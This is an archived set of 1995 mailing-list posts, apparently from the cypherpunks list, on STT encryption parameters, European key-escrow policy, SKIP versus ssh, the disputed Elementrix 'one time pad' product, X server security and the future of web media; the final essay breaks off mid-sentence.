Utne Reader	    Minneapolis, MN	1-612-338-6043
Whole Earth Review  Sausalito, CA	1-415-332-2416  Kevin Kelly


kelli at zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)>
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams



carolann at censored.org

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann at censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/






From somogyi at digmedia.com  Fri Sep 29 12:34:44 1995
From: somogyi at digmedia.com (Stephan Somogyi)
Date: Fri, 29 Sep 95 12:34:44 PDT
Subject: STT is 40-bit for RC4, 56-bit for DES
Message-ID: 


>From the STT spec, page 73:

6.8 CRYPTOGRAPHY

A. Encryption

Two bulk encryption algorithms are used in STT - RC4 and DES.

1. STT uses RC4 encryption with 8-byte keys, of which 3 bytes are salt,
in the clear. See the RC4Key entry under the Low Level Composites
sub-section of this document. RC4 is a stream cipher; there are no pad
bytes and the encrypted data is the same size as the plaintext data.

2. STT uses the Cipher Block Chaining (CBC) mode of DES, as defined in
Federal Information Processing Standard FIPS 81. The key is 8 bytes
long, with each byte having a parity bit in position 0. Thus there are
56 bits of random key. STT uses an all-zero byte Initialization Vector
(IV). A maximum of 8 bytes of padding is applied to every plaintext
message encrypted with DES to pad the message to a length that is a
multiple of 8 bytes. Pad bytes have a value of

      x = 8 - ((length of the plaintext) mod 8)

and the number of pad bytes is also x. For example, if the plaintext
message was 17 bytes long, then each of the 7 bytes of padding contains
the value 0x07. If x is 0, then there are 8 bytes, each containing
0x08. Padding is appended to the end of the plaintext before encryption
and is stripped off after decryption.

B. Signatures

STT uses PKCS #1 Encryption block formatting for RSA signatures. Total
length is 128 bytes for the signature (1024-bit modulus). The following
is the plaintext:

(TLV_SIGNATURE
    (BYTE[20] HashOfData)    ;Hash of the data being signed
    (BYTE 0)                 ;parser initializer
    (BYTE[105] 0xff)         ;padding
    (BYTE 0x01)              ;recom. for private key encryptions
    (BYTE 0))                ;overflow protection for RSA

C. Hashing

All hashes in STT are 20-byte SHA hashes. See Federal Information
Processing Standards FIPS 181 for the specification of SHA hashes.

________________________________________________________________________
Stephan Somogyi                Mr Gyroscope                Digital Media







From dmandl at panix.com  Fri Sep 29 12:37:11 1995
From: dmandl at panix.com (dmandl at panix.com)
Date: Fri, 29 Sep 95 12:37:11 PDT
Subject: Info War Comes Home
In-Reply-To: <199509291728.NAA27408@panix.com>
Message-ID: 


On Fri, 29 Sep 1995, Duncan Frissell wrote:

> [Note:  Whenever I do one of my longer pieces, it seems to drop into the
> void.  Perhaps they are so well written and complete that no one can think
> of any comment to make on them.  Perhaps not.  Read this one and comment.
> You won't regret it.]
> 
> In honor of the Second Annual Conference on Information Warfare a few
> weekends ago, here is my proposal towards a paper to be presented at next
> year's conference.

A couple of things jump to mind:

Though I know you only used War as a metaphor, even that rubs me the
wrong way.  I don't like wars or people who fight them--namely States,
bullies (BIG bullies), and other Territorial Gangsters.  It's an
authoritarian, hierarchical model, even though I realize you're using
it loosely.  Your piece is very short on details, but the few you give
all employ the War metaphor: "neighborhood defense," sensors, video
cameras, etc.

I have no problem with some of these things per se, especially if
they're targeted against the State, but I also have no interest in
living in a kind of permanent war zone.  This strikes me as a negative
approach versus the more positive approach of, say, mutual assistance
groups like the "tong."  (Hakim Bey wrote an excellent essay on tongs
and their applicability to modern anarchist groups, btw.  If anyone's
interested, send me an email message with subject "TONG PLEASE" and
it'll be sent to you automatically.)

Anyone attracted by the idea of urban warfare should read Mike Davis's
excellent "City of Quartz."  He's talking about the modern city
(specifically, L.A.) as a war zone pitting _haves against have-nots,_
but the idea is the same, and it's scary as hell.

I'm ambivalent, to say the least, about the mania for getting
everything in the world WIRED, but if you want to convince me you'll
have to come up with a model that offers me something _constructive._

Cheers.

   --Dave.

--
Dave Mandl
dmandl at panix.com
http://wfmu.org/~davem





From buescher at lust.ugcs.caltech.edu  Fri Sep 29 12:49:05 1995
From: buescher at lust.ugcs.caltech.edu (Brent Buescher)
Date: Fri, 29 Sep 95 12:49:05 PDT
Subject: "Who shall speak for us?"
In-Reply-To: 
Message-ID: <44hiiv$s2h@gap.cco.caltech.edu>


Is there a charter for the mailing list?  Some kind of broad position
paper and possibly a history of "exploits" would be helpful for the
typical mediadroid.  Also, maybe the thing to do is to point media
types who want spokespeople in the direction of the EFF.

I have a good friend that's a reporter for a local TV station, and
when you realize how much pressure these guys are under to get a
complete story in a handful of hours and condense it down into one
minute of something that's interesting to Joe Sixpack, it's easy to
understand how the mass media messes up anything vaguely technical or
not easily understood in terms of people's preconceived ideas
(prejudices).

Brent







From dl at hplyot.obspm.fr  Fri Sep 29 13:54:37 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Fri, 29 Sep 95 13:54:37 PDT
Subject: Anon Http web Proxy V2.1
In-Reply-To: <9509281922.AA18715@hplyot.obspm.fr>
Message-ID: <9509292054.AA24798@hplyot.obspm.fr>


 > I fixed the IOs, it now works a lot faster, play with it on 
 >   http://hplyot.obspm.fr:6661/  (no abuse plz)
 > and get the source package on 
 >   [old now invalid url deleted]

Ok, I updated my tclbin thing to include the unbuffered IO change,
And I've added everything you need to build the shell, as well as the
proxy source itself, in the latest tclbin release :
    ftp://hplyot.obspm.fr/tcl/tclbin-0.5.tgz

I wonder if anyone is interested ?

ps: I received today the rsa/amno shirts I've ordered from Adam, they
*rocks*, well designed, very good quality,... a must ! see
http://www.dcs.ex.ac.uk/~aba/uk-shirt.html
{no i don't earn a buck for advertising :-)}

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

terrorist strategic South Africa munitions Nazi jihad Marxist





From trei at process.com  Fri Sep 29 14:02:13 1995
From: trei at process.com (Peter Trei)
Date: Fri, 29 Sep 95 14:02:13 PDT
Subject: (Fwd) Internet  Euro-Clipper
Message-ID: <9509292102.AA10120@toad.com>


------- Forwarded Message Follows -------
>From Risks Digest, via www-buyinfo

============================================
F Y I

from the RISKS DIGEST-----------

Date: 20 Sep 1995 12:24:10 GMT
From: rja14 at cl.cam.ac.uk (Ross Anderson)
Subject: European Governments Agree to Ban Strong Crypto

According to an article in `Communications Week International', the 
34-nation Council of Europe has agreed to outlaw strong encryption 
products which do not make keys available to governments.

The article, `Euro-Clipper chip scheme proposed', is on the
front page of the magazine's issue 151, dated 18th September, which 
arrived in my mail this morning.

It relates that the policy was approved on the 8th September
at Strasbourg by the Council, and coincides with an attempt by the 
European Commission to propose a pan-European encryption standard. 
The Council - unlike the Commission - has no statutory powers to 
enforce its recommendations.

However, Peter Csonka, the chairman of the committee that
drafted the document (and an administrative officer at the 
Council's division of crime problems) says that `it is rare for 
countries to reject  Council of Europe recommendations'.

The proposal would make telecomms operators responsible for
decrypting traffic and supplying it to governments when asked. It 
would also `change national laws to enable judicial authorities to 
chase hackers across borders'.

Opposition to this measure was expressed by Mike Strezbek,
VP responsible for European telecomms at JP Morgan, who said that 
his organisation `will challenge any attempt to limit the power of 
our network encryption technologies very strongly'.

Czonka said that the Council had given consideration to
business interests but had tried to strike a balance between 
privacy and justice. However, `it remains possible that 
cryptography is available to the public which cannot
be deciphered,' his document says. `This might lead to the
conclusion to put restrictions on the possession, distribution, or 
use of cryptography.'

Apparently another international organisation, the OECD, has
called a conference of its members in December to devise a strategy 
on encryption.

I for one will be making clear to my MP that his stand on
this issue will determine how I cast my ballot at the next 
election. I note that John Major stated in a 1994 parliamentary 
written reply to David Shaw MP that the government did not intend 
to legislate on data encryption. 

I am disappointed that government policy has changed to the point 
of supporting the Council of Europe, and that this change has 
sneaked through during the parliamentary recess.

Ross Anderson





Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei at process.com





From lethin at ai.mit.edu  Fri Sep 29 14:07:33 1995
From: lethin at ai.mit.edu (Rich Lethin)
Date: Fri, 29 Sep 95 14:07:33 PDT
Subject: SOFTWARE: Filtering ads out of popular web sites
Message-ID: <199509292107.RAA25904@grape-nuts.ai.mit.edu>



On the subject of HTTP proxies, 

[SEVERAL FWD'S DELETED, ENTERTAINING SUBJECTS RETAINED]

- - - Begin forwarded message - - -

Subject: The agents/advertising arms race heats up
Subject: OH YEAH BABY, FILTER ME HARDER

>From: Axel Boldt 
>Newsgroups: comp.infosystems.www.announce
>Subject: SOFTWARE: Filtering ads out of popular web sites
>Organization: Univ of California at Santa Barbara, Dept of Mathematics
>Approved: www-announce at boutell.com
>Message-ID: <44ercn$nhl at holly.aa.net>

Several popular web sites have recently turned to putting advertising
gifs on their pages. NoShit is a tool that filters these out so that
you don't see them - in fact, you don't even download them in the
first place, thus saving time, money and brain capacity.

NoShit is implemented as a set of patches against Cern httpd to turn
it into a "filtering proxy server". This means that the proxy
maintains a list of URL templates together with corresponding filter
scripts. When a document is requested form the proxy that matches one
of the templates, then the page is piped through the corresponding
script before being presented to the client. This works together with
caching, if desired.

The idea is to run your own personalized NoShit proxy server and point
your browser to it. The proxy does the filtering; the browser doesn't
even know about it. This scheme works with every browser.

I have written a ready-to-use library of filter scripts for a couple
of well known, ad-infected sites, including Yahoo, Lycos, Netscape,
HotWired, CNN, Infoseek and NandO Times. You can change these or add
your own very easily.

Locations:
            
                (Germany)
    
            
                (California)

Enjoy,
  Axel

- - - End forwarded message - - -







From jim at acm.org  Fri Sep 29 15:26:06 1995
From: jim at acm.org (Jim Gillogly)
Date: Fri, 29 Sep 95 15:26:06 PDT
Subject: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: 
Message-ID: <199509292225.PAA25735@mycroft.rand.org>



> Doug Hughes  writes:
> It seems to be a OTP/stream cipher of some kind.. subsequent number depending
> on previous numbers. I don't know if its possible to prove that the sequence
> will never repeat, having not seen the algorithm. But if it did not, it would
> seem to be strong enough. Too many questions, too few answers.

It does seem to be a stream cipher of some kind.  Subsequent numbers
depending on previous numbers means that it's an autokey cipher.  That
most assuredly does  make it a one time pad, no matter whether it
ever repeats or not (which it presumably wouldn't).

Here's an easy way to demonstrate that the strength of this system is less
than a one time pad.  Let's give the attacker all the breaks: he knows the
initial secret key, he has watched the key exchange from both sides by
monitoring all keystrokes, and has access to all the keying information
and plaintext and ciphertext that has happened from day 0 until now, day
30, but none of the plaintext or other keying information thereafter.

Case one: the system you're flogging.  He can keep reading the mail.
Case two: a true one time pad.  He immediately loses touch with the system
          as soon as they go to the first unknown byte of the one time
          pad.

I sympathize with their desire to call it a one time pad, since that has
obvious marketing cachet.  But it isn't -- can't they simply say they
think it's a nice strong cipher?

	Jim Gillogly
	Sterday, 8 Winterfilth S.R. 1995, 22:21





From nobody at REPLAY.COM  Fri Sep 29 15:40:21 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 29 Sep 95 15:40:21 PDT
Subject: Call for IT Sec XX
Message-ID: <199509292240.XAA16987@utopia.hacktic.nl>



From: 


                      Call for White Papers

     Information Technology Security Policy Setting Process

                          issued by the

                   Cross-Industry Working Team

                  Thursday, September 28, 1995


Introduction

The Cross-Industry Working Team (XIWT) is seeking inputs from 
U.S.
industry on ways to improve the process by which public policy 
on
information technology  systems security is developed. At the
invitation of the Information Infrastructure Task Force (IITF) 
of
the U.S. government, XIWT is soliciting ideas broadly from US
industry, in the form of White Papers that address this issue. 
XIWT
will, later this year, convene a workshop of industry experts 
to
organize the ideas and suggestions expressed in these White 
Papers
into a report for use by the IITF, and will prepare a report to 
be
made available to the public.

XIWT is a multi-industry coalition of organizations committed 
to
defining the architecture and key technical requirements for a
powerful and sustainable national information infrastructure 
(NII).
XIWT aims to foster the understanding, development and 
application
of technologies that cross industry boundaries; facilitate the
conversion of the NII vision into real-world implementations, 
and
facilitate a dialogue among representatives of stakeholders in 
the
private and public sector. Additional information about XIWT 
can be
found on the Internet at: http://www.xiwt.org/homepage.


Information Technology Systems Security

In the developing National Information Infrastructure (NII),
information technology will be deployed in a wide range of 
contexts
and systems including communications, computing, software 
systems,
and many different types of applications. The ability of this
technology, and the systems which employ it, to provide the
requisite levels of security and protection, are of concern to
almost everyone.

Issues of central concern include: physical protection of 
systems
and their contents, potential vulnerabilities at various points
within the networked environments of these systems, and the 
ability
to provide or even guarantee reliable and/or uninterruptable
service. The infrastructure for such capabilities will need to
include mechanisms for the protection of networks, computers 
and
other types of equipment as well as systems that employ these
elements, as well as methods for analysis, certification and
validation of technology and systems, and for facilitating the
setting of standards. It is likely that cryptographic 
capabilities
will need to be available throughout for possible use in 
protection
and authentication of information. Issues involving the 
management
of  these capabilities will need to be uncovered, discussed and
resolved where possible. At present, the federal government has 
no
formal process in place, in the Congress or in Executive Branch
agencies, which adequately involves the private sector in the
determination of public policy in this area.

Responsibilities for this broad area within the federal 
government
are widely diffused and do not necessarily insure that all the
relevant concerns of the private sector are taken into account.
Further, no single process is used by the various parts of the
federal government and a variety of policies, reflected in 
laws,
regulation and practice, usually result. A methodology is 
required
by which private sector interests can be adequately expressed 
and
factored into resulting policies. The purpose of this call for
white papers is to request written inputs from interested and
knowledgable parties on how the formal process to developing
information technology systems security policies may be 
improved,
and particularly on how private sector inputs can be most
effectively incorporated.

Specifically, industry is requested to identify those areas,
domains, and issues that are especially relevant for 
consideration,
and to recommend specific suggestions or approaches by which 
the
policy determination process in these areas may be improved. 
This
may entail, for example,  the establishment of one or more 
bodies
dedicated to this purpose, within or across domains; the 
creation
of a broad set of principles for the government or other bodies 
to
employ; the setting of national goals or other specific
recommendations for federal action.


Submissions

White papers are specifically solicited from U.S. industry; 
other
individuals who wish to contribute are welcome to do so.
Submissions may be made on paper or electronically by sending
electronic mail, document files, or via a form located on the 
XIWT
World Wide Web server (addresses below). Submissions made on 
behalf
of companies will be taken to represent the views of the firm;
these will be verified if it is not made clear in the 
submission
that the document represents a company position. Individual
submissions will not be verified if they do not claim to 
represent
company positions.

Submissions should be: 1) responsive to the primary goal of 
this
call, (focused specifically on process improvement and not the
presentation of  view on policy deficiencies or on desired
policies); 2) clear in terms of specific topics, areas or 
domains
of policy; 3) reasonably direct, brief and timely.

Any format may be used for the white paper, and it may be of 
any
length. However, submissions must include the following
information, on envelopes or headers to email and web messages, 
and
on the submission document, whatever its form:

1.   The name of individual making the submission;

2.   The name of firm on whose behalf the submission is made;

3.   The return address by which submission may be verified, if
     necessary.

XIWT will convene a one or two day  invitational workshop in 
the
Washington DC area in December, 1995, to review submissions and
organize the preparation of findings. Papers received by 
November
15, 1995, will be used in the workshop.  The report of this 
effort
is intended to be made available in February, 1996.

Submissions must be made to one of the following addresses:

Conventional Mail:

     Security Policy Process
     XIWT
     1895 Preston White Drive
     Suite 100
     Reston VA 22091-0913

Electronic Mail:

     secpros at cnri.reston.va.us

Please place: "Security Policy Process" in the "Subject:" 
field.
Please use ASCII text in any attachments.

World Wide Web: suggestions may be contributed via the internet 

at: http://www.xiwt.org/response


The content of submissions will be used by XIWT only for the
purposes described in this call. No specific attribution to
individual companies or individuals will be made in the 
findings or
report. We look forward to your help in this important national
effort.

For additional information, please contact Charles Brownstein 
or
Pam Memmott 
Tel:  (703) 620-8990
Internet: cbrownst at cnri.reston.va.us
Internet: pmemmott at cnri.reston.va.us


9/22/95; PJM








From Doug.Hughes at Eng.Auburn.EDU  Fri Sep 29 15:42:08 1995
From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes)
Date: Fri, 29 Sep 95 15:42:08 PDT
Subject: SKIp
Message-ID: <199509292241.RAA24918@dns.eng.auburn.edu>


anybody have any opinions on SKIP (Sun's IP level encryption).
How does it compare for encrypting between machines to something like
ssh? (Obviously ssh is more portable, other than that)
	Doug





From dvw at hamachi.epr.com  Fri Sep 29 15:59:38 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Fri, 29 Sep 95 15:59:38 PDT
Subject: Elementrix Press Release
Message-ID: <306C7A37@hamachi>



     ELEMENTRIX ANNOUNCES REVOLUTIONARY ENCRYPTION
     FOR INTERNET AND ALL DIGITAL COMMUNICATION ANNOUNCED AT
     NETWORLD + INTEROP

POTP Secure Mail, Secure FTP Avoid Limitations of Existing Systems

    NEW YORK, Sept. 29 /PRNewswire/ -- Elementrix Technologies, Inc. has
announced a security technology for digital communications based on the
only encryption method which is considered unbreakable.  The method,
POTP (Power One Time Pad) eliminates the weaknesses that allow break-ins
to existing systems.
    Two products which feature this technology, POTP Secure Mail and
POTP Secure FTP were voted the leading security products in the Best of
the Show awards announced at the Networld + Interop Show in Atlanta this
week.  The technology is expected to be a boon to both corporate and
individual users of the Internet and a major step forward for electronic
commerce.
    The products are an automatic implementation of One Time Pad (OTP),
the only encryption which is considered unbreakable.  Prior to the
invention of POTP, OTP was used only in extreme situations where cost
and logistical constraints were not determining factors.  Now POTP(TM)
makes this legendary encryption readily available as a commercial
software package.
    As with OTP, POTP creates keys that are as long as the messages they
encrypt, and are used only once.  But unlike OTP, which requires
extensive key distribution and management, POTP(TM) creates real time:
random keys are created automatically during the communication process.
Therefore, users can instantly send private and sensitive e-mail over
the Internet or other open systems with 'point and click security.'
    "Elementrix has found a logical way to generate non-algorithmic,
dynamically changing keys at two separate sites without transmitting
them on the line and without using parallel lines," said Dr. David Kahn,
the country's leading historian of cryptography and the current visiting
historian at the National Security Agency.
    "Elementrix is well within its rights to call this technology Power
One Time Pad.  I see no way of reconstructing the encryption key," he
said at the press conference announcing the products.
    "POTP represents a paradigm shift in encryption," said Winn
Schwartau, an internationally recognized expert on electronic security
who also spoke at the press conference.  "The fundamental technology is
entirely different from any existing encryption scheme.  This is the
first system I've ever seen that can make the entire Internet secure for
non-expert users."
    Schwartau also noted the importance of the system for corporate
users based on its advantages in the area of key management.
    "The problem with systems that depend on passwords for security is
that the infrastructure required to manage and distribute them is
cumbersome, especially in large organizations," he said.  "POTP
eliminates the need for this infrastructure."
     POTP(TM) technology can be used to encrypt any digital
communication.  This can include data communications, secure telephones,
wireless, satellite, cable TV and virtually any method of modern,
digital communications.  All POTP(TM) products are automatic and
transparent to the user.
    The system addresses a paradox in encryption:  "If the keys are
truly unpredictable then there should be no way for one party to
automatically re-create the same keys that are being used by the other,"
said Isaac Rubinstein, executive vice president of Elementrix
Technologies Inc.
    "However, POTP's dynamically changing random keys are created by a
patent pending method during the communication process itself," he said.
"After the POTP(TM) between the two parties has been initialized -- only
the very first time they communicate -- a One Time Pad process is
executed continuously."
    POTP(TM) is patent pending.  This unique method is fully disclosed
on an individual basis only, through a non-disclosure agreement.  A
select group of encryption and security experts, including Kahn and
Schwartau, have been fully briefed and have endorsed the new technology.
    POTP(TM) Secure Mail carries a very low overhead of less than 1.2%.
Encryption and decryption are very fast and have virtually no effect on
software performance.  The system requires an IBM or compatible computer
with a 386 or higher CPU and 4MB of RAM; a modem or network card; and
any TCP/IP stack for Microsoft Windows.  The software is Windows 3.1 and
Windows 95 compatible.

    Professsional Encryption/Personal Privacy
    In the e-mail package, the entire message including attachments is
encrypted in real time as it leaves the PC.  Messages remain totally
private while stored on the mail server, handled by an Internet
provider, and/or sent over communication lines.  Messages are sent in
standard e-mail format with no need for a special mail server.  Any
standard SMTP/POP3 mail server will handle the messages.
    There is no need for any manual key distribution or management:  no
public and private keys; no master and session keys.  Messages remain
private and cannot be read by anyone, even system administrators.
    The manufacturer's suggested list price for the single user is $245.
A special price of $198 will be available during the product
introduction.

    Elementrix Technologies
    Elementrix Technologies Inc., based in New York City, is a
subsidiary of Elementrix Technologies Ltd., based in Haifa, Israel.  The
parent company is a subsidiary of Elron Electronic Industries Ltd.,
Israel's leading advanced technology holding company.  Elementrix was
founded in January 1994 in order to develop commercial applications for
its POTP(TM) encryption and other security products.

CONTACT: Michael Meric, Fusion TMA, 212-977-4600, fax: 212-265-9684, e-mail:
mmeric at elementrix.co.il, or Maia Aron, VP Marketing, Elementrix,
212-888-8879, fax: 212-935-3882, e-mail: maia at elementrix.co.il







From warlord at MIT.EDU  Fri Sep 29 16:22:52 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Fri, 29 Sep 95 16:22:52 PDT
Subject: SKIp
In-Reply-To: <199509292241.RAA24918@dns.eng.auburn.edu>
Message-ID: <199509292322.TAA09464@toxicwaste.media.mit.edu>


> anybody have any opinions on SKIP (Sun's IP level encryption).
> How does it compare for encrypting between machines to something like
> ssh? (Obviously ssh is more portable, other than that)

SKIP and ssh perform very different operations.  SKIP is an IP-level
encryption engine (ala IP-SEC), whereas ssh is an application-level
encryption engine.  You can run ssh on top of SKIP.  And using SKIP I
can encrypt every single IP packet leaving my machine; you can't do
that with ssh.

Does this help?

-derek






From jwz at netscape.com  Fri Sep 29 16:26:29 1995
From: jwz at netscape.com (Jamie Zawinski)
Date: Fri, 29 Sep 95 16:26:29 PDT
Subject: Netscape hole without .Xauthority (fwd)
In-Reply-To: 
Message-ID: <306C804A.3CE1CFB@netscape.com>


Jyri Kaljundi wrote:
> 
> There's a huge hole in the Netscape remote control mechanism for the
> X-Windows based clients.
> Potential impact : anybody can become any user that uses Netscape on any
> system without sufficient X security.

Did you bother to read the spec?  This doesn't matter; if I can
connect to your X server at all, you have already lost.  The spec
(at http://home.netscape.com/newsref/std/x-remote.html) contains:


                              SECURITY CONCERNS
 
Any client which can connect to your X server can control a Netscape
Navigator process running there; authenticating the originator of the
request is beyond the scope of this protocol. It is assumed that the
underlying X security mechanisms will prevent unauthorized people from
accessing your server.
 
It is important (in general) that everyone be aware of the security
risks associated with allowing unlimited access to your X server.
Regardless of whether you use Netscape Navigator, allowing arbitrary
users and hosts access to your X server is a gaping security hole. If
hostile forces an connect to your server, it is trivially easy for them
to execute arbitrary shell commands as you, read and write any of your
files, and watch every character you type.
 
Again, this has nothing to do with Netscape Navigator. It is a property
of the X Window System. If you have turned off security on your X server
with the xhost + command, or if you have announced that a host is
``trusted'' by using xhost or by listing that host in your /etc/X0.hosts
file, then you should be aware of the consequences. If this causes
access to be possible from a host which is not, in fact, trusted, then
you have left your doors wide open.
 
For more information about the security mechanisms one can use with an X
server, consult the manual pages for X(1), Xsecurity(1), xauth(1), and
xhost(1), or talk to your system administrator.

-- 
Jamie Zawinski    jwz at netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda





From vznuri at netcom.com  Fri Sep 29 16:27:27 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Fri, 29 Sep 95 16:27:27 PDT
Subject: Web "places" and the media monsters
Message-ID: <199509292319.QAA21372@netcom10.netcom.com>



below is an interesting excerpt from Boardwatch magazine, which I find
to be a good source for internet/web/BBS coverage. it talks about how
the Web, to continue its momentum, may evolve into something like
BBSes that give the sense of an online community..

also, I recently read a chapter from an upcoming book, I think it was
by Negroponte, and he pointed out how the web/gopher servers did not
really explode until the introduction of Mosaic and an *image* standard
was put into HTML. (to this I would add forms capability-- buttons, etc.)
This suggests that the success of the Web is really highly predicated
on the easy-to-use interface of Web browsers, and the nice visual presentation
given by images etc.  in other words, the "hypertext" capabilities, while
tremendous, were not necessarily the *key* factors in driving its use, but
when coupled with these other ingredients, really pushed it all "over the
top".

this makes a lot of sense to me. the human being is very visually oriented
(large amounts of brain capacity are dedicated to processing images). I think
the days of computer programs as "lines of text scrolling up the screen" are
increasingly numbered because of this. the easy-to-use GUI will be the model
of most future software for a long time.

in addition to this, I would add that I suspect that as soon as web pages 
begin to convey a sense of community (as
mentioned in this column), through conferences etc., the growth of the 
web will increase even more dramatically.. I also continue to believe
that "groupware" will prove to be a very important aspect of future web
development.. (so I agree with TCM that isolated software packages that
do not really integrate with the web to do groupware are going to eventually
go extinct).

the thoughts in this column also tie in with the recent NYT Levy column
in which Levy pointed out how the internet is an entirely new medium
for broadcasting in which the individual has total freedom and egalitarianism 
that cannot be found in any other medium of the past, and that for this reason 
all the recent frenzied, slobbering  media mergers are actually "rearranging
the deck chairs on the titanic" (he credits J.Gilmore for this quote, who 
seems to have an amazing propensity for great soundbites). 

I agree with this wholeheartedly. the big media conglomerates are going to
be quite terrified when they eventually realize that the main thing they
are providing is a *distribution channel*, and that these very costly 
distribution channels are all obsoleted (sorry to verb that word ) by
the introduction of cyberspace for the masses. artists are free to try
to reach the audience in whatever means they see fit; they are no longer
dependent on the media machines to make a living. I have talked to various
musicians for example who find that they can create their own CDs through
individually contracting with various companies and make far more in profit 
than they can from going with record companies (who shave off enormous amounts 
of artist profit to feed the machine).

an amusing pink floyd song that has a biting satire of a 
record company executive. "the band is just fantastic!! that's really
what I think!! oh by the way, which one's pink?? oh, have you seen 
the charts?? everyone else is just green!! this could be made into a 
monster if we all pull together as a TEAM!!"

now, I don't believe this means the end of various artistic people
and occupations such as producers, directors, etc.  however the artist/writer/
whatever suddenly becomes the driving component, the centerpiece,
of the entire process. he has the ability to very discriminately decide
who he wishes to work "with" (not for!) and who will benefit from his 
own work and in what way. he is no longer a cog in the machine but in
fact the director and driving force of it all. he has the ability to
cut out the parasitical middleman like never before (I do think there
are many truly *beneficial* middlemen out there to help the artist flourish,
and the future will help separate the wheat from the chaff).

there are some things that very big companies give you, and one
of them is a very big budget. but if this is the only purpose of a big
company, than it can almost be seen just as a big investment firm or
capital generating machine. this machine will probably continue to 
exist but will be in an increasingly subservient role to how artists
wish to interact with it, IMHO. this can already be seen in how top
actors and directors are now setting their own terms like never before.

amazingly, as TCM noted in a recent post, industry pundits at one
point were actually saying that "hypertext is dead" a few years ago,
because no new developments had been made in it and the Ted Nelson
Xanadoodoo silliness had never gotten anywhere (despite major bucks
thrown at him-- one almost wonders if he set back hypertext, rather
than advanced it, but that's another story). this is the amazing
lack of vision that most people have about the future, about what 
consumers are really interested in, and you can see it again noted by 
Rickard below. 

at one point huge bucks were being thrown down prototype
projects to deliver news through the vertical-blank interval of the television
screen, and newspapers thought this would be the "information delivery
vehicle of the future". the service flopped. the lesson was not that
"hypertext is dead" or "online services are not profitable" (some of the
actual conclusions of industry analysts) but that this was not the exact
form that the public was interested in.

there is a difference that I have emphasized elsewhere about "interactive"
vs. "interconnective". the former would refer to a human interacting with
computer, like a CD rom game, or hypertext, or whatever. the latter refers
to humans interacting with other humans through cyberspace, more directly,
more viscerally: email, chat forums, communities, multiplayer games, etc.  
the latter is the ingredient that is really driving the hyper cyberspatial 
renaissance, IMHO, and Rickard brings out this point below.  (the neat
thing about home pages is not so much that they are pretty and visually 
appealing, but that they are written by your friend Joe Schmoe next door,
and highly personalized, quirky and eccentric.)

for some of my own investment tips , if you want to 
invest in companies that understand where the future is going, invest in the 
ones that understand: 

1. anyone should be able to publish on the network. no one (not government,
not media company, not internet provider, etc.) is authorized to
control others through allowing or denying access, charging exhorbitant
taxes, charging exhorbitant overhead, etc.  this is not merely a statement
of what is desirable, or my own wishful thinking, it's a basic future reality 
that is already largely formed at this moment. those who don't like it and
fight it will simple fail to be competitive and survive over the long run.

2. the content-providers will not have to pay much for the infrastructure
to provide their wares. in the past distribution and content could not
be separated, and those in control of the former could control the latter.
the two have been *cleaved* in the present and the future. the distribution
costs for "media" are going to become almost completely negligible in
the future. the distribution channels will involve cutthroat competition,
and enormous bandwidth for virtually free. 

2.5 companies that understand this "cleaving" will prosper. companies
that are trying to combine content and delivery don't "get it" and will
probably split or die.

3. humans want to "interconnect" with other humans. pretty pages and
all that other stuff is great, but it doesn't create the insatiable enthusiasm
for being online that "interconnection" does. the future "killer apps"
will be increasingly "interconnective, not interactive".

4. increasingly, quality and true artistry will flourish. you will not be 
able to make a quick buck from crappy material. the public will be able 
to be very selective.  they might be able to buy individual songs from 
songwriters, individual essays from writers, etc. (through clicking on 
various web pages).

5. middlemen will become increasingly accountable for what kind of
value they are adding to the final product. they will not become obsolete,
but will have to justify their cut.  the artist will no longer have to
sell their soul just to get a record or writing in front of the public.
the artist will write their own ticket and set their own standards.
the exploitative aspects of the current media machine (which are quite
reprehensible and widespread, from what I can tell) are going to
be replaced with a "kinder, gentler" approach..

6. the days of a zillion people watching the same program or listening
to the same music are dead.  this is much lamented by the media monsters, 
because this was a big aspect driving their existence. this is not 
so much a "fragmentation of markets" but actually a "blossoming of
individuality". the net will continue to fragment artistic tastes. but
individuals will have little problem fulfilling their own tastes.

7. the paradox of all this is that when people are more free to pursue
that which interests them in particular, and they are not "homogenized
out of existence", the overall organism flourishes. there is nothing
to be lamenting in that a thousand people now do not listen to the same
music or read the same newspaper or whatever-- this is something to 
celebrate. it scares people like politicians, who derive much of their
power from "homogenization".. but thankfully this is another case where I 
think the future will separate the healthy from the lame, presuming
their is indeed a distinction in this case 

as you can see, a lot of these points, which may seem pretty obvious to 
a lot of people here, are fundamentally not understood by today's preening
media magnates (which, perhaps, are the entities that *will* become extinct). 
but it's just fine to let them go on their merry way, you know what they say 
about fools and money.

I don't really have any idea, really, where the massive media mergers are
going to go. I certainly am not saying they are going to disappear overnight.
one possibility, as I mentioned, is that they would tend to
become just huge, competing capital providers. they might turn into sort
of "artistic communities", each with a different flavor. if they are going
to die, though, the eclipse will certainly be messy as these big monsters
